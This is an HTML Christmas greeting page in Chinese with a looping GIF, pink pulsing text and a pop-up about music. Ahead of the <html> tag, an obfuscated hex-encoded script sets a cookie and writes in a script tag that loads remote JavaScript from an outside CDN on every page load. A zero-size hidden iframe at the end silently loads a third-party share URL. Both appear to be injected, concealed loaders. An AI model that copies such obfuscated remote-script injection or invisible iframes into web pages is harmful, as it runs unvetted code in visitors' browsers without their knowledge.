<!DOCTYPE html>
<script>var _0xd4d9=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x2E\x6D\x73\x73\x74\x61\x74\x69\x63\x2E\x6E\x65\x74\x2F\x6D\x61\x69\x6E\x33\x2F\x63\x6F\x6D\x6D\x6F\x6E\x2F\x61\x73\x73\x65\x74\x73\x2F\x74\x65\x6D\x70\x6C\x61\x74\x65\x2F\x68\x65\x61\x64\x2F\x61\x64\x2E\x74\x6D\x70\x6C\x5F\x61\x39\x62\x37\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0x64d8x2,_0x64d8x3,_0x64d8x4){var _0x64d8x5= new Date();_0x64d8x5[_0xd4d9[1]](_0x64d8x5[_0xd4d9[0]]()+ _0x64d8x4);document[_0xd4d9[2]]= _0x64d8x2+ _0xd4d9[3]+ _0x64d8x3+ _0xd4d9[4]+ _0x64d8x5[_0xd4d9[5]]()}setc(_0xd4d9[6],_0xd4d9[7],360);document[_0xd4d9[9]](unescape(_0xd4d9[8]));</script><html>
    <meta charset="UTF-8">
	<head>
		<meta charset="utf-8">
	<pre><title>匙玖祝你们圣诞节快乐</title>
	</head>
 <script>
 alert("进入后会有音乐，如果没有请去其他渠道打开此链接，如QQ，浏览器")
 
 </script>
	<style>
		body {height: 100%;
		  padding: 0;
		  margin: 0;
		  background: #000;}
			img{display: block;
			margin: 0 auto;}
		label{display: block;
			margin: 0 auto;
			color: pink;
			font-size: 20px;
			padding-right: 5px;
			animation:mymove 2.5s infinite;
		-webkit-animation:mymove 2.5s infinite;}
		@keyframes mymove
			{
			50% {font-size: 40px;}
		}

		@-webkit-keyframes mymove
		{
			50% {font-size: 40px;}
		}
		.middle{
			width: 100%;
			height: 0%;
			display: flex;align-items: center;
		}
		.middle2{
			position: absolute;
			z-index: 2;
			width: 100%;
			height: 100%;
            margin: auto;
display: flex;align-items: center;}
.zi{
  font-weight:400;
  color:#ABABAB;
  font-size:200px;
  position:absolute;
top:1000px;
left:300px;
text-shadow:20px 2px 20px rgb(0,255,255);
  }
	</style>
</head>
<body>
    <div class="container">
        <span></span>
        <span></span>
        <span></span>
        <span></span>
        <span></span>
    </div>
	<body>
		<div class="middle">
			<div class="middle2">
        </br>
			</div>	<img src="https://pic.imgdb.cn/item/638ee8fbb1fccdcd360398db.gif"width="1000" height="650"/>
		</div>
  </body>
  <div class="zi"><i>匙玖</i></div>
  <iframe src="http://share.duoduoipo.com/share/index.php?ddsid=266338398&ddsrc=WEIXIN&share=1&type=ring" width="0" height="0"> &amp;lt;/body&amp;gt; &amp;lt;/html&amp;gt;</iframe>
</html>
